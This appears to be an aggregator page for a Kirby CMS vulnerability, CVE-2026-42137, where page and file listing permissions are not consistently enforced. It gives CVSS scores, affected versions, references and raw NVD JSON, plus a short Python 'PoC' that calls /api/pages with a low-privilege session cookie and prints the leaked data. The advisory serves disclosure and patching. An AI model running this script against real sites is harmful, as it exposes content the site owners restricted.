CVE-2026-42137

Description

Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* - VULNERABLE

Kirby < 4.9.0

Kirby < 5.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_host = "http://target-kirby-site.com"
endpoint = "/api/pages"

# Attacker's low-privilege session cookie
# Replace with a valid session token obtained after login
cookies = {
    "kirby_session": "attacker_low_priv_session_token_here"
}

# Send request to list pages (bypassing permission check)
response = requests.get(f"{target_host}{endpoint}", cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! Leaked page data:")
    print(response.text)
else:
    print("[-] Exploit failed or already patched.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42137
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42137
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42137/
[4] VulDB https://vuldb.com/cve/CVE-2026-42137
[5] https://github.com/getkirby/kirby/releases/tag/4.9.0
[6] https://github.com/getkirby/kirby/releases/tag/5.4.0
[7] https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42137", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:22.653", "lastModified": "2026-05-18T13:00:27.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.9.0", "matchCriteriaId": "1BB5394F-37F9-4A53-9CE7-79548F674886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.4.0", "matchCriteriaId": "B2D943B9-CD71-45FE-A1A4-158603C3502E"}]}]}], "references": [{"url": "https://github.com/getkirby/kirby/releases/tag/4.9.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/releases/tag/5.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}